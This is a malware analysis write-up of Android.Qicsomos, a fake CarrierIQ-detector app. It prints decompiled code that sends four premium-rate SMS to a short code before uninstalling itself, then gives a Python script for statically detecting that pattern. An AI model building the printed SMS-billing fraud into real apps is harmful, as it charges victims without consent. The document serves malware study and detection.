Detailed Analysis of Android.Qicsomos

Intro: What is Android.Qicsomos?

Android.Qicsomos is a new Android malware family that appeared a few days ago. Its payload sends SMS messages to a premium-rate short code, billing the victim without consent.

Analysis of the Application and Its Structure

The app requests the following permissions:

  • android.permission.READ_LOGS
  • android.permission.SEND_SMS

After the application has been installed, its icon appears in the launcher. The application name and UI are made to look like a CarrierIQ detector app, so the victim is unlikely to suspect anything until the charges appear on the phone bill.

The Malicious Parts:

The malicious part of the app is triggered when the user taps the "Déinstaller" ("Uninstall") button. Before the app removes itself, it sends four SMS messages to the short code "81168" with the bodies "AT37", "MC49", "SP99" and "SP93". The decompiled code shows that each subsequent send, and finally the uninstall intent, sits inside its own nested try block (see the following code snippet):

// Decompiled excerpt; the decompiler's jump labels (label15, label26, ...) have been removed.
// localSmsManager is an android.telephony.SmsManager, normally obtained with
// SmsManager.getDefault(); its declaration is not part of the excerpt.
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try {
    localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
    try {
        localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
        try {
            localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
            // Only after the four premium SMS have been sent does the app ask the system to uninstall it.
            Intent localIntent = new Intent("android.intent.action.DELETE", Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
...
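The combination seen above (SEND_SMS in the manifest, sendTextMessage() calls with a hard-coded numeric short code and literal message bodies, and a self-uninstall intent right after them) is a fingerprint that can be checked statically over decompiled output. The script below is an added example written for this write-up, not code from the sample or from Mobile-Sandbox. The manifest fragment and the source text it scans are constructed here to mirror the permissions and snippet shown above; the short-code heuristic (purely numeric, 3 to 6 digits) and the regexes are assumptions of this example, not a published signature.

```python
"""Static triage of a decompiled Android app for the Android.Qicsomos pattern:
SEND_SMS permission + hard-coded sendTextMessage() calls to a short code,
followed by a self-uninstall (ACTION_DELETE) intent.
Added example; not the sample's own code."""
import re
from dataclasses import dataclass

# Constructed manifest fragment (assumption: only the two permission names
# are known from the analysis; everything else here is illustrative).
CONSTRUCTED_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.projectvoodoo.simplecarrieriqdetector">
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>
"""

# Constructed decompiled source mirroring the snippet quoted in the analysis.
CONSTRUCTED_SOURCE = """
localSmsManager.sendTextMessage("81168", null, "AT37", null, null);
try {
    localSmsManager.sendTextMessage("81168", null, "MC49", null, null);
    try {
        localSmsManager.sendTextMessage("81168", null, "SP99", null, null);
        try {
            localSmsManager.sendTextMessage("81168", null, "SP93", null, null);
            Intent localIntent = new Intent("android.intent.action.DELETE",
                Uri.parse("package:org.projectvoodoo.simplecarrieriqdetector"));
"""

PERM_RE = re.compile(r'<uses-permission\s+android:name="([\w.]+)"')
# SmsManager.sendTextMessage(destinationAddress, scAddress, text, sentIntent, deliveryIntent):
# match only calls whose destination and text are string literals.
SEND_RE = re.compile(r'sendTextMessage\(\s*"([^"]*)"\s*,\s*[^,]+,\s*"([^"]*)"')
DELETE_RE = re.compile(r'"android\.intent\.action\.DELETE"')


@dataclass(frozen=True)
class SmsSend:
    destination: str
    body: str


def manifest_permissions(manifest: str) -> set:
    """Permission names declared with <uses-permission>."""
    return set(PERM_RE.findall(manifest))


def hardcoded_sms_sends(source: str) -> list:
    """sendTextMessage() calls with literal destination and body.
    Calls with computed arguments are deliberately not matched; those need
    dynamic analysis (or a sandbox report) rather than a regex."""
    return [SmsSend(dst, body) for dst, body in SEND_RE.findall(source)]


def is_short_code(destination: str) -> bool:
    """Heuristic (assumption of this example): purely numeric and 3-6 digits.
    Ordinary subscriber numbers are longer and usually carry a '+' prefix."""
    return destination.isdigit() and 3 <= len(destination) <= 6


def triage(manifest: str, source: str) -> dict:
    """Combine the three indicators into one verdict dictionary."""
    perms = manifest_permissions(manifest)
    sends = hardcoded_sms_sends(source)
    short_codes = {s.destination for s in sends if is_short_code(s.destination)}
    verdict = {
        "send_sms_permission": "android.permission.SEND_SMS" in perms,
        "hardcoded_sends": len(sends),
        "short_code_destinations": short_codes,
        "self_uninstall": bool(DELETE_RE.search(source)),
    }
    # All three together form the fingerprint described in the analysis.
    verdict["suspicious"] = (verdict["send_sms_permission"]
                             and bool(short_codes)
                             and verdict["self_uninstall"])
    return verdict


if __name__ == "__main__":
    for key, value in triage(CONSTRUCTED_MANIFEST, CONSTRUCTED_SOURCE).items():
        print(f"{key}: {value}")
```

Run it on the output of a decompiler (e.g. one Java or smali file at a time, after converting smali's `const-string`/`invoke-virtual` pairs to the same call shape, which this example does not do). A hit on all three indicators is a reason to pull the sample into a sandbox and confirm the actual SMS traffic; a miss only says the destination was not a string literal.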

Sample Information:

sha256: 79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4

md5: 69b9691a8274a17cdc22e9681b3e1c74

Mobile-Sandbox Report
